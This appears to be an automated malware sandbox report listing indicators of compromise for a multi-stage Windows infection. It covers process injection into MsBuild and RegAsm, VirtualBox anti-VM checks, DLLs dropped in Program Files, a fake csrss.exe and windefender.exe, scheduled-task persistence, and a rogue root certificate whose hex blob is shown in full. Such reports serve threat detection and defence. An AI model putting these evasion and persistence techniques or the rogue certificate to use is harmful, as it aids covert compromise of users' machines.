PID 1080 set thread context of 4956	1080	jr4FrI9_X7jQLPHGvjPB4osL.exe	MsBuild.exe
PID 5752 set thread context of 1884	5752	dckuybanmlgp.exe	conhost.exe
PID 5752 set thread context of 5888	5752	dckuybanmlgp.exe	svchost.exe
PID 4956 set thread context of 5192	4956	iTYVFkMjmhiHGHjan9fR.exe	RegAsm.exe

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

Processes:

B5DnhFsDXUm0GjlatykVFhd5.exetps1VzfXq5Mcx5uJvDrHkokV.exe

description	ioc	process
File opened (read-only)	\??\VBoxMiniRdrDN	B5DnhFsDXUm0GjlatykVFhd5.exe
File opened (read-only)	\??\VBoxMiniRdrDN	tps1VzfXq5Mcx5uJvDrHkokV.exe

Drops file in Program Files directory 14 IoCs

Processes:

WhLgyvu.exe

description	ioc	process
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	WhLgyvu.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	WhLgyvu.exe
File created	C:\Program Files (x86)\SwHdQyPSnQdU2\OSiQwyolSrNRT.dll	WhLgyvu.exe
File created	C:\Program Files (x86)\mfOEuGwqkLFbC\IrzHiqi.dll	WhLgyvu.exe
File created	C:\Program Files (x86)\ITFcQRBGgRUn\GpLzrcZ.dll	WhLgyvu.exe
File created	C:\Program Files (x86)\BcCQMXwjU\SQylrR.dll	WhLgyvu.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	WhLgyvu.exe
File created	C:\Program Files (x86)\BcCQMXwjU\fucXyMe.xml	WhLgyvu.exe
File created	C:\Program Files (x86)\mfOEuGwqkLFbC\wIcRuyB.xml	WhLgyvu.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	WhLgyvu.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	WhLgyvu.exe
File created	C:\Program Files (x86)\SwHdQyPSnQdU2\kKfseWG.xml	WhLgyvu.exe
File created	C:\Program Files (x86)\xRoHTrfYcfGreqCFIqR\DOcLAqV.xml	WhLgyvu.exe
File created	C:\Program Files (x86)\xRoHTrfYcfGreqCFIqR\MEhwcaY.dll	WhLgyvu.exe

Drops file in Windows directory 8 IoCs

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeB5DnhFsDXUm0GjlatykVFhd5.execsrss.exe

description	ioc	process
File created	C:\Windows\Tasks\MVZgvzYKAFemhQpXL.job	schtasks.exe
File created	C:\Windows\Tasks\fjXiyaIJtNnEyln.job	schtasks.exe
File created	C:\Windows\Tasks\xxPoWeVRQBzFwCLPV.job	schtasks.exe
File created	C:\Windows\Tasks\bXvtwaJkKQEzfXjvnG.job	schtasks.exe
File opened for modification	C:\Windows\rss	B5DnhFsDXUm0GjlatykVFhd5.exe
File created	C:\Windows\rss\csrss.exe	B5DnhFsDXUm0GjlatykVFhd5.exe
File created	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

2900 sc.exe
5756 sc.exe
5448 sc.exe
5028 sc.exe
5796 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
2900	sc.exe
5756	sc.exe
5448	sc.exe
5028	sc.exe
5796	sc.exe

Program crash 12 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2516	2816	WerFault.exe	EL0V9jsicQkwu5y5A3tv3gtV.exe
1832	2816	WerFault.exe	EL0V9jsicQkwu5y5A3tv3gtV.exe
1992	2816	WerFault.exe	EL0V9jsicQkwu5y5A3tv3gtV.exe
764	1700	WerFault.exe	RegAsm.exe
5032	2816	WerFault.exe	EL0V9jsicQkwu5y5A3tv3gtV.exe
1412	2816	WerFault.exe	EL0V9jsicQkwu5y5A3tv3gtV.exe
1196	2816	WerFault.exe	EL0V9jsicQkwu5y5A3tv3gtV.exe
5220	1344	WerFault.exe	EVRLEFHpACwBC7LNv6ChLne3.exe
2476	2816	WerFault.exe	EL0V9jsicQkwu5y5A3tv3gtV.exe
5884	1080	WerFault.exe	jr4FrI9_X7jQLPHGvjPB4osL.exe
5604	4832	WerFault.exe	RegAsm.exe
1344	2124	WerFault.exe	RegAsm.exe

Checks processor information in registry 2 TTPs 28 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

EVRLEFHpACwBC7LNv6ChLne3.exeWINWORD.EXEfirefox.exefirefox.exemJkh_vBPKYWlrKhfwjZe_fEy.exeRegAsm.exefirefox.exeCUHeVRB27PX1VvaDsknUfd39.exePOWERPNT.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	EVRLEFHpACwBC7LNv6ChLne3.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	mJkh_vBPKYWlrKhfwjZe_fEy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	mJkh_vBPKYWlrKhfwjZe_fEy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	CUHeVRB27PX1VvaDsknUfd39.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	CUHeVRB27PX1VvaDsknUfd39.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EVRLEFHpACwBC7LNv6ChLne3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RegAsm.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	POWERPNT.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Creates scheduled task(s) 1 TTPs 20 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
4436	schtasks.exe
4468	schtasks.exe
2180	schtasks.exe
1492	schtasks.exe
3384	schtasks.exe
6000	schtasks.exe
1696	schtasks.exe
2508	schtasks.exe
3156	schtasks.exe
3192	schtasks.exe
3140	schtasks.exe
828	schtasks.exe
5940	schtasks.exe
3196	schtasks.exe
5492	schtasks.exe
1636	schtasks.exe
5616	schtasks.exe
3564	schtasks.exe
5864	schtasks.exe
4592	schtasks.exe

Enumerates system info in registry 2 TTPs 22 IoCs

Query Registry

System Information Discovery

Processes:

rundll32.exechrome.exePOWERPNT.EXEInstall.exechrome.exechrome.exeWINWORD.EXEchrome.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

GoLang User-Agent 9 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description	flow	ioc
HTTP User-Agent header	6417	Go-http-client/1.1
HTTP User-Agent header	7721	Go-http-client/1.1
HTTP User-Agent header	388	Go-http-client/1.1
HTTP User-Agent header	392	Go-http-client/1.1
HTTP User-Agent header	6324	Go-http-client/1.1
HTTP User-Agent header	7730	Go-http-client/1.1
HTTP User-Agent header	410	Go-http-client/1.1
HTTP User-Agent header	6372	Go-http-client/1.1
HTTP User-Agent header	6440	Go-http-client/1.1

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

5824 taskkill.exe

pid	process
5824	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exewindefender.exepowershell.exepowershell.exeB5DnhFsDXUm0GjlatykVFhd5.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-251 = "Dateline Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1832 = "Russia TZ 2 Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time"	B5DnhFsDXUm0GjlatykVFhd5.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-302 = "Romance Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2891 = "Sudan Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time"	B5DnhFsDXUm0GjlatykVFhd5.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time"	B5DnhFsDXUm0GjlatykVFhd5.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1932 = "Russia TZ 11 Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-122 = "SA Pacific Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1861 = "Russia TZ 6 Daylight Time"	B5DnhFsDXUm0GjlatykVFhd5.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time"	B5DnhFsDXUm0GjlatykVFhd5.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-571 = "China Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-722 = "Central Pacific Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-449 = "Azerbaijan Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time"	B5DnhFsDXUm0GjlatykVFhd5.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time"	B5DnhFsDXUm0GjlatykVFhd5.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-142 = "Canada Central Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-361 = "GTB Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1912 = "Russia TZ 10 Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time"	B5DnhFsDXUm0GjlatykVFhd5.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-501 = "Nepal Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1412 = "Syria Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time"	B5DnhFsDXUm0GjlatykVFhd5.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-602 = "Taipei Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time"	B5DnhFsDXUm0GjlatykVFhd5.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe

Modifies registry class 2 IoCs

Processes:

MiniSearchHost.exefirefox.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000_Classes\Local Settings\MuiCache	MiniSearchHost.exe
Key created	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000_Classes\Local Settings	firefox.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

Processes:

RegAsm.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	RegAsm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	RegAsm.exe

Suspicious behavior: AddClipboardFormatListener 4 IoCs

Processes:

vlc.exePOWERPNT.EXEWINWORD.EXE

pid process

5500 vlc.exe
3952 POWERPNT.EXE
1420 WINWORD.EXE
1420 WINWORD.EXE

pid	process
5500	vlc.exe
3952	POWERPNT.EXE
1420	WINWORD.EXE
1420	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

CzvCj0FEbiMieZehO5NAjU6Y.exeUo565YYjVS0blKWqp_vGqUmK.exel0GYgdTIEqcOpBSBqDB_SP8p.exemJkh_vBPKYWlrKhfwjZe_fEy.exeEVRLEFHpACwBC7LNv6ChLne3.exeCUHeVRB27PX1VvaDsknUfd39.exepowershell.exeRegAsm.exechrome.exedckuybanmlgp.exeRegAsm.exe

pid	process
3948	CzvCj0FEbiMieZehO5NAjU6Y.exe
3948	CzvCj0FEbiMieZehO5NAjU6Y.exe
2056	Uo565YYjVS0blKWqp_vGqUmK.exe
2056	Uo565YYjVS0blKWqp_vGqUmK.exe
3492	l0GYgdTIEqcOpBSBqDB_SP8p.exe
3492	l0GYgdTIEqcOpBSBqDB_SP8p.exe
2104	mJkh_vBPKYWlrKhfwjZe_fEy.exe
2104	mJkh_vBPKYWlrKhfwjZe_fEy.exe
1344	EVRLEFHpACwBC7LNv6ChLne3.exe
1344	EVRLEFHpACwBC7LNv6ChLne3.exe
244	CUHeVRB27PX1VvaDsknUfd39.exe
244	CUHeVRB27PX1VvaDsknUfd39.exe
3964	powershell.exe
3964	powershell.exe
3948	CzvCj0FEbiMieZehO5NAjU6Y.exe
3964	powershell.exe
244	CUHeVRB27PX1VvaDsknUfd39.exe
244	CUHeVRB27PX1VvaDsknUfd39.exe
3492	l0GYgdTIEqcOpBSBqDB_SP8p.exe
3492	l0GYgdTIEqcOpBSBqDB_SP8p.exe
3492	l0GYgdTIEqcOpBSBqDB_SP8p.exe
3492	l0GYgdTIEqcOpBSBqDB_SP8p.exe
3492	l0GYgdTIEqcOpBSBqDB_SP8p.exe
3492	l0GYgdTIEqcOpBSBqDB_SP8p.exe
1344	EVRLEFHpACwBC7LNv6ChLne3.exe
1344	EVRLEFHpACwBC7LNv6ChLne3.exe
4832	RegAsm.exe
4832	RegAsm.exe
3492	l0GYgdTIEqcOpBSBqDB_SP8p.exe
3492	l0GYgdTIEqcOpBSBqDB_SP8p.exe
404	chrome.exe
404	chrome.exe
5752	dckuybanmlgp.exe
5752	dckuybanmlgp.exe
5752	dckuybanmlgp.exe
5752	dckuybanmlgp.exe
5752	dckuybanmlgp.exe
5752	dckuybanmlgp.exe
5752	dckuybanmlgp.exe
5752	dckuybanmlgp.exe
1452	RegAsm.exe
1452	RegAsm.exe
1452	RegAsm.exe
1452	RegAsm.exe
1452	RegAsm.exe
1452	RegAsm.exe
1452	RegAsm.exe
1452	RegAsm.exe
1452	RegAsm.exe
1452	RegAsm.exe
1452	RegAsm.exe
1452	RegAsm.exe
1452	RegAsm.exe
1452	RegAsm.exe
1452	RegAsm.exe
1452	RegAsm.exe
1452	RegAsm.exe
1452	RegAsm.exe
1452	RegAsm.exe
1452	RegAsm.exe
1452	RegAsm.exe
1452	RegAsm.exe
1452	RegAsm.exe
1452	RegAsm.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

vlc.exe

pid process

5500 vlc.exe

pid	process
5500	vlc.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 48 IoCs

Processes:

chrome.exechrome.exechrome.exechrome.exe

pid	process
404	chrome.exe
404	chrome.exe
404	chrome.exe
404	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
4708	chrome.exe
1052	chrome.exe
1052	chrome.exe
1052	chrome.exe
1052	chrome.exe
1052	chrome.exe
